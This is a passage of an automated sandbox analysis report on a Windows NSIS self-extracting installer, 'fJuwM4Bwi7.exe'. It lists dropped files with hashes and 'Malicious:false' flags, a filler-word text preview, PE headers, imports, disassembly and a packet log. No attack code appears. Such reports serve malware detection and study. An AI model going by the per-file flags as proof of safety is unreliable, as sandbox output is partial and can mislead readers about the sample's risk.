                                      Entropy (8bit):4.665955956980643
                                      Encrypted:false
                                      SSDEEP:24:ZsK6DXm4O/SIzh3T3DcW9kjioek2kiE7I8JLEXIcfpy3gILbHLEyoUQll:ZX4O66cykxGE7rEIuIv/oyoB7
                                      MD5:509F09BC859F53A5D728B23EA140EAB6
                                      SHA1:99E6E1EFE5EB129B608E81F90B0109EAE1763D31
                                      SHA-256:FCC5D4A2E0881D23F6C696DFB854B0B348FB552C4CF6B001C2B2594F14E7F499
                                      SHA-512:5C9CE0916D77DE0D51FCF90DCD25144B679B5827074ACBE2C74D862702582B6001A201540D5B00F07AFCBB1FD1908C1579D2B05B69A85C4DACFC1E7274711AB9
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):13161
                                      Entropy (8bit):4.9126755870483
                                      Encrypted:false
                                      SSDEEP:384:X1AiZV4bKGFvytAAQTi5hMU708wbHhzCiFel:llXGFy9D4HJ3K
                                      MD5:6D9C825C8AE36D64EEF435461CE73532
                                      SHA1:4718C6BE7780A611D9A88E99EFFE5DFF487F9BEC
                                      SHA-256:00D99DD2F1D3196580D52247D1D45605DA3F5EE2893BDE0B6855DD10E63A7569
                                      SHA-512:B8E8BF5E1872D3981629D6747C21AE4634628792997C9322C0088251D47FCB83A516D6DFF3C694D0134EB9BA77EC7D7BF3B09994EC9ABED01554637AEA6F4DA7
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):10676
                                      Entropy (8bit):4.902534302182149
                                      Encrypted:false
                                      SSDEEP:192:RmN6YZxvgXhbbZhe6/PK5X1937sCfOh1ZGXerBUfk89HHWva2GkzypGBnaRKb:QNLxvgXhXZhh/PK5XH3QukzGOrBUfk8m
                                      MD5:2B83BF46A89D65CF762BDDC2C38E9E7B
                                      SHA1:E59B337AC20C43CE7F4B486C38486F8912C98789
                                      SHA-256:624B10DFF501106FD6297B70FAFB3505DD1AACDAA29D895E72A0AE77CA0FAB90
                                      SHA-512:6C217CAF5D9A5F679C6E4904904B0B19F11C8A42547056442783F32CE73723FDD4F159127D38ACC34CB3A91A3553FF73159ED895ED89E5A264426154F512AF97
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):11037
                                      Entropy (8bit):4.8737997168752125
                                      Encrypted:false
                                      SSDEEP:192:5D/P9kefPUbCijjBw/TI5F44EOvex8O5+2idKNr1k7PKTf0YsBcCfPdlEjQM/:tP/fPU+ijoQF44EOGuO5+2VNre+L0YkI
                                      MD5:BD2878F5871E874FA3A7C037048F7C3C
                                      SHA1:DDB784273BF208161E10C930EF94788F42C1E4BD
                                      SHA-256:A82D5E28FF5C786801A0D526DB840EE3452B74274C0D95A37C9A7180E0859D87
                                      SHA-512:35CD9C96334787A3D0168367FB27714339FDBC9F3107F81B2197730BF7B496D038B2D617F4F6C6F6D1A4B2C6375C9C36732AF715E88B7F5CB2FA69516868CD24
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):4180
                                      Entropy (8bit):4.9321374408025465
                                      Encrypted:false
                                      SSDEEP:96:48Ez2ekD6/CkklLdgw/Hk4hHe1egefyK2WP3d+lw/6olYP1eI7:/EK4/+uwHk5DeaK2BW6rcI7
                                      MD5:568E524C05FD8EE41882BBC14464C6D3
                                      SHA1:8130F25AD135621E2F451EFD20A3B180C01A3F66
                                      SHA-256:D923009286A94EA38855A2BADF858969428C2DA0E65AC3DAE8CB886BF3EE2BF7
                                      SHA-512:00F9B3763CA9223002E421294A7FD69A9E9FFC2AF399F48226FDBB0523A82AA5C4E6DCFDCA073FCFA5B21DF8AC397D0F6701CB47D8750915D370B627927CC308
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9445
                                      Entropy (8bit):4.921016570871312
                                      Encrypted:false
                                      SSDEEP:192:VTVWctVeruwskAXv0v/LLDkNpYl7R/OuR6CHkm/EpRGtfMCzYaKN/:2ctsTCf0r0LcOuR6CHv8VsK
                                      MD5:852509E2C3FFFA729FDFFCCFE066CDB4
                                      SHA1:F1C2F850464412285FF92F72613CA9442DB734E8
                                      SHA-256:FE87AC62DBC45B792551492C09613DB3F2831185F6E7A33CE5617BB0E59E3FA1
                                      SHA-512:B4C1542FD567D265BD78DF03691051D874EF6CD8FE6D29AD418C7DD766B7067183AF5608E9F15941515B0E7846215399AF33DD1FACDF0BAB966764B6CA377CD1
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):7123
                                      Entropy (8bit):4.932139967662198
                                      Encrypted:false
                                      SSDEEP:96:cAbrH6fD8NbUwBsatM8DzRcRWXqUrDcML+Cf+5arV1lSRiHzLUlkLBj4I1Xk0:tLeD8BDmRlAHlnlS2LUkuI100
                                      MD5:D81EC25A5BEE5D384868B24A6A8C663F
                                      SHA1:F131AB88175DAF4039D860FEEEC4B1A6D21E121E
                                      SHA-256:2C11D49A6BFB47ED8197A18DED9282686795BAB7E2F09B7B127917C88269B206
                                      SHA-512:2BE940E42C70C592B2F9C3637F56851BFBBB8FAB5539D51E04C3ED2E15E76E88562D176B234739C8EEA3F438D328065E471077C278A2DACE8AF2FED02CE7C6A9
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):15098
                                      Entropy (8bit):4.909030925775806
                                      Encrypted:false
                                      SSDEEP:192:fNq+2AFf73C5TP3cahnwy2G6kZhcm/bA/wdY1Z6+gFIDsPkXL4AQLd0hge1g3:ff2+u3wqbculuL949y/y
                                      MD5:74779824ACAE1E1C870095C780405054
                                      SHA1:DC4C932288B739DD1345D7BF64A683750BEE2C4D
                                      SHA-256:809FDA512937EF4C6BC58C22C47993DFA100AE4DF56C8B0A14CB759A40E6EF62
                                      SHA-512:DCCC9248E22CB16BBFDF7985F116F599EB97A4B63CCF8203276C600765648062C59238BE409B18E9C9F09840E80451F3CF2F59CEAE5B8D098C38BC5E399F4474
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):3930
                                      Entropy (8bit):4.785707533776321
                                      Encrypted:false
                                      SSDEEP:48:eYGsZJaswkWb5y5SwsmAeeiVSRG8fcl6FH7tSVlPgc6pcAUkWz+CaN6wm0uln:wwaqEy5SwsLeeicgAcl6FbIVucAUEFq
                                      MD5:F4F390C25CFBB9F86EDAD76C437F6571
                                      SHA1:548390DEB8C7A5021676CB1E0C03FC6AABF89B98
                                      SHA-256:AF12D990703C8FC341CBF9FE7F5B51938408D5FE48CA388DB39BDCD35EDD90D3
                                      SHA-512:47F0520EAFA72308B188099F796E9713A4CFCDEA9BBBBF523136A371AEA3D4D167F3467708CE9EC6D82BC09862DA7D5BD122CB183796E948BCAB41665D07238A
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:OpenPGP Secret Key
                                      Category:dropped
                                      Size (bytes):11048
                                      Entropy (8bit):4.872168059153243
                                      Encrypted:false
                                      SSDEEP:192:dZ0sW/87yXEweaM8tpic2SGGfMIyUlj0wggbxIrfmsxiS:dZ0sw87zjBspic2SGGR1lj0wgoxI3J
                                      MD5:7721863171BA672F3F660981C836E35B
                                      SHA1:6F7A2C0D30D51CA6B31F0FCC803D58100D1D54BE
                                      SHA-256:290F31B8FB70C5E745918DF19CF3A2DD3E7D368A2BC5D9C79611D004AB2AC9D8
                                      SHA-512:0474541FFE562D37BB638EA5500189F4E093E59A6CE8F4039E1BDD4FFB4EF7CBFA18D6850F81DA416DCF91BA40836C73684BE405091708351F5ACD00DD27CC3C
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):592
                                      Entropy (8bit):4.204861403479884
                                      Encrypted:false
                                      SSDEEP:12:PjO2xFPAeLUzV3ByBRCs+4LlMvJLHYEEHaBAH2s2N+k/+IQI:PiOF3UzlByBRCsVGtYEYWsY+E+IQI
                                      MD5:8097E08408C796656D6FBE5B4011609A
                                      SHA1:234444944CBE5C50C7DC38FD51C565CCA3276164
                                      SHA-256:24677BD64BDFB8D904A096D013232993C005856ED59AA5FFBE504EB4F761CD75
                                      SHA-512:127264BCA9489E3CEF728204AA128E705730513025E8B7E0F8464ABE5D0EDEE3FC8D5043E4DA7D8A67A3A115AEF7237BC04C6CD5CD956923AFC1921FD3D29638
                                      Malicious:false
                                      Preview:gasterozooid blottedes undershrievery reorientation konsistoriemedlems dokumentdisketten brevstemmende defilerede studiekammerater forstuvelsens..metastrophic kabiet serb aflbsrens ordmnstrets simulatoropgave tholes,frygtlse cloudlessly fylderiets kpheste isabelles unsalvageably appelerer optics infralyd theligonaceae suspensively..snerp separatkabinettet paralegal xenofobiernes chervante stivelseskorn achromobacterieae,brygmester brevaabners kontraheredes pullulated musketerens studentereksamener poliad,underarmsmusklen askorbinsyretabletten backtracks stvises termcap kinoorgels trog.
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):15062
                                      Entropy (8bit):4.9357451772131204
                                      Encrypted:false
                                      SSDEEP:384:pl7QxurtO8pawzlNSBjw6YhtRK61R1f7W0:P7QxuhO8pawgwXR1TW0
                                      MD5:56013432CE9F5F20196ED4D8766EB72A
                                      SHA1:4DF3B7CDFFD65DD9D14BB212080C608703906554
                                      SHA-256:71341213976B73E52A10998CCB06599C8EDC6E7D12E3338927FE56E5DABAE760
                                      SHA-512:C8BB9713C4E9B7CB95C452FA8E112B0C11A92F7C3661D902E50B51552981AB60404E5D84FB3CFC7B4794963C06E3B0E73892794CDAAF95846B8B67B838AE384A
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:OpenPGP Public Key
                                      Category:dropped
                                      Size (bytes):13588
                                      Entropy (8bit):4.923594985159061
                                      Encrypted:false
                                      SSDEEP:192:JwxK7lxC6+88oXtWeJvBdfUW8aZcrZFb0IDAeXBZ3QHju4LEFdTKUAZNW:Jd+6+88neJvB78aiZZDDXBZADu4LaSZQ
                                      MD5:A1BB2C0226A81753C3C2F6FA6562B6F3
                                      SHA1:EDC6ECAFA090B95F7B4A3E3B26A6A4E5539D932B
                                      SHA-256:F89E9A19B6D6A219D9AAC39623DC5C30CFEA6519CC7376E18656A5A7C999DC53
                                      SHA-512:26695DBF9FDE77625A12BE1F12797DF821B8B20204D4BE58D5E43E27159908D7AFBA4ADAA1B39438D931C076854877B3008A4F12CE984053C877D5C89E15F000
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):8230
                                      Entropy (8bit):4.9095691270975985
                                      Encrypted:false
                                      SSDEEP:192:ADjauT3yXT1VRXVkCGOeTC3WgdgTNb7dYSxs446HTXZG:ADjaZDFV7Hx3Wgd8b757k
                                      MD5:6E58E362553B5789E1069A0179B61372
                                      SHA1:99780077DCED2149B6BF80439172FF98DF8F90E6
                                      SHA-256:EF7907372F05F11488321AB0694B0C59BB487F9B8C87E6C7AD93D33C226EB194
                                      SHA-512:6FB5A47A7B8937D898FF58D4FC5ED7959AB10C9E3EDDF66585BE7FB011CF46AC7EDA4FDCBF81297DEB841DE807A3CA2A23C4B205C71CDDEF8D8DC87B1B15EFB0
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):358713
                                      Entropy (8bit):7.648793540736881
                                      Encrypted:false
                                      SSDEEP:6144:uKPS3s/UriKDyqFZ8q/Uj6iYTVhKstsXxp0TL6OOGUMpo6hcHaj3jT:3NiiKDs0hKMsBprznM3fz
                                      MD5:7F347CFA8F27E352ED83C3BB88C5057B
                                      SHA1:8EE750C1E86644CA4E938CE66EAC4C50207C1B21
                                      SHA-256:CC97921E1FFF1EE9561EA1D79F6FF1F297AB05004AE150828E33A2C032C3C37E
                                      SHA-512:09D6C2C4C7EACF5F5FF9397CC13E5EF8A1A9565F5D292071C96A91969B3F0E029D0579F7CC2DEE6B5A90CC67E3F7E7039572C165987B1655C7C871AD24B95DDB
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1767
                                      Entropy (8bit):4.936734149511583
                                      Encrypted:false
                                      SSDEEP:24:n4sZF5zb4UBKl2YkTL9us5GTtqBXclmjZk/7V91eIS9naSCKvDwoqjLpKk1Na:nNJ+rkvspOclmdkzX1L8aS70ouUaa
                                      MD5:9A172303DA4D5A6FFFA3583CD88A6848
                                      SHA1:A59F712638898ED08E235ED321B8F3033F32B324
                                      SHA-256:E99BB7DF5EA4A3983D7308A41630A8B1128A1F7E0E59B7F02511DFC71E67BDC4
                                      SHA-512:4C6755EA315DCA8868EA650CFAEE595D60B910A6829DF232CDDB617318BD81B40A8E407E5B5135A485EEDD76265A04A2FF75DBE656C5D216F1EF0672EAAF5631
                                      Malicious:false
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.947296688885364
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:fJuwM4Bwi7.exe
                                      File size:600'280 bytes
                                      MD5:0cb5485c0840cf976767bc45fb0b45d4
                                      SHA1:3eee45faada0a0ee309065cc279b6c38e6dd809b
                                      SHA256:82940860d0091481df6eb2a273504bd2066f83649ffd87dffe03582440a938cc
                                      SHA512:dc7a88850a94809beeaccee769b580d6a99af3ac7b53b4720856cb341c3b57144480eca4b0ed00c791fc84d9a8544f255289b479ab97df407f1caaf9dbad9d56
                                      SSDEEP:12288:2K9/JmMgq+TiZFJVsTej4jsLhzBMiMMx8cjDBlDvvK1adEMNqn5+:tj+Tirqej1RRx8O/vPdE1nQ
                                      TLSH:61D4125436E2D47EEA402775DFA7A7FAC2249D28C6251B0F0F953FBE7D360518E28221
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....\.U.................^...........2.......p....@
                                      Icon Hash:4740490d27a52145
                                      Entrypoint:0x403217
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x55C15CE3 [Wed Aug 5 00:46:27 2015 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:59a4a44a250c4cf4f2d9de2b3fe5d95f
                                      Instruction
                                      sub esp, 00000184h
                                      push ebx
                                      push ebp
                                      push esi
                                      xor ebx, ebx
                                      push edi
                                      mov dword ptr [esp+18h], ebx
                                      mov dword ptr [esp+10h], 00409130h
                                      mov dword ptr [esp+20h], ebx
                                      mov byte ptr [esp+14h], 00000020h
                                      call dword ptr [00407034h]
                                      push 00008001h
                                      call dword ptr [004070B4h]
                                      push ebx
                                      call dword ptr [0040728Ch]
                                      push 00000009h
                                      mov dword ptr [004237B8h], eax
                                      call 00007F2AB0C534CAh
                                      mov dword ptr [00423704h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+38h]
                                      push 00000160h
                                      push eax
                                      push ebx
                                      push 0041ECB8h
                                      call dword ptr [00407164h]
                                      push 004091E4h
                                      push 00422F00h
                                      call 00007F2AB0C53174h
                                      call dword ptr [004070B0h]
                                      mov ebp, 00429000h
                                      push eax
                                      push ebp
                                      call 00007F2AB0C53162h
                                      push ebx
                                      call dword ptr [00407118h]
                                      cmp byte ptr [00429000h], 00000022h
                                      mov dword ptr [00423700h], eax
                                      mov eax, ebp
                                      jne 00007F2AB0C506CCh
                                      mov byte ptr [esp+14h], 00000022h
                                      mov eax, 00429001h
                                      push dword ptr [esp+14h]
                                      push eax
                                      call 00007F2AB0C52BF2h
                                      push eax
                                      call dword ptr [00407220h]
                                      mov dword ptr [esp+1Ch], eax
                                      jmp 00007F2AB0C50785h
                                      cmp cl, 00000020h
                                      jne 00007F2AB0C506C8h
                                      inc eax
                                      cmp byte ptr [eax], 00000020h
                                      je 00007F2AB0C506BCh
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x2b6d8 | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x1000 | 0x5c3a | 0x5e00 | e5e7adda692e6e028f515fe3daa2b69f | False | 0.658951130319149 | data | 6.410406825129756 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata | 0x7000 | 0x11ce | 0x1200 | 5801d712ecba58aa87d1e7d1aa24f3aa | False | 0.4522569444444444 | OpenPGP Secret Key | 5.236122428806677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data | 0x9000 | 0x1a7f8 | 0x400 | cc58d0a55ac015d8f1470ea90f440596 | False | 0.615234375 | data | 5.02661163746607 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata | 0x24000 | 0x14000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc | 0x38000 | 0x2b6d8 | 0x2b800 | b6d42514c2cc09fb8e6265d6a2c193e7 | False | 0.9366244612068966 | data | 7.857509251924338 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                      RT_ICON | 0x38418 | 0x18ef9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.000401421619981
                                      RT_ICON | 0x51318 | 0x833d | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.9935410899782718
                                      RT_ICON | 0x59658 | 0x350c | PNG image data, 256 x 256, 4-bit colormap, non-interlaced | English | United States | 1.0008100147275405
                                      RT_ICON | 0x5cb68 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.6025933609958506
                                      RT_ICON | 0x5f110 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6329737335834896
                                      RT_ICON | 0x601b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | English | United States | 0.7006929637526652
                                      RT_ICON | 0x61060 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States | 0.7924187725631769
                                      RT_ICON | 0x61908 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.5280487804878049
                                      RT_ICON | 0x61f70 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States | 0.7109826589595376
                                      RT_ICON | 0x624d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7225177304964538
                                      RT_ICON | 0x62940 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.6854838709677419
                                      RT_ICON | 0x62c28 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.7263513513513513
                                      RT_DIALOG | 0x62d50 | 0x100 | data | English | United States | 0.5234375
                                      RT_DIALOG | 0x62e50 | 0x11c | data | English | United States | 0.6056338028169014
                                      RT_DIALOG | 0x62f70 | 0xc4 | data | English | United States | 0.5918367346938775
                                      RT_DIALOG | 0x63038 | 0x60 | data | English | United States | 0.7291666666666666
                                      RT_GROUP_ICON | 0x63098 | 0xae | data | English | United States | 0.6264367816091954
                                      RT_VERSION | 0x63148 | 0x24c | data | English | United States | 0.5255102040816326
                                      RT_MANIFEST | 0x63398 | 0x33f | XML 1.0 document, ASCII text, with very long lines (831), with no line terminators | English | United States | 0.5547533092659447
                                      DLL | Import
                                      KERNEL32.dll | GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                      USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                      GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                      SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                      ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                      COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                      ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                      VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                      Language of compilation system | Country where language is spoken | Map
                                      English | United States |
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Jun 4, 2024 14:14:46.485620022 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.490683079 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.490942955 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.490969896 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.491163015 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.496113062 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.496320963 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.496346951 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.496531963 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.501193047 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.501517057 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.501543045 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.501737118 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.506302118 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.506550074 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.506577969 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.506755114 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.511322021 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.511450052 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.511471987 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.511674881 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.516302109 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.516556025 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.516575098 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.517041922 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.521156073 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.521339893 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.521356106 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.521677971 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.525957108 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.526139975 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.526155949 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.526359081 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.530873060 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.531104088 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.533304930 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.533488035 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.533503056 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.533752918 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.538049936 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.538305044 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.538321018 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.538520098 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.542948961 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.543314934 CEST49843443192.168.11.30172.217.215.132
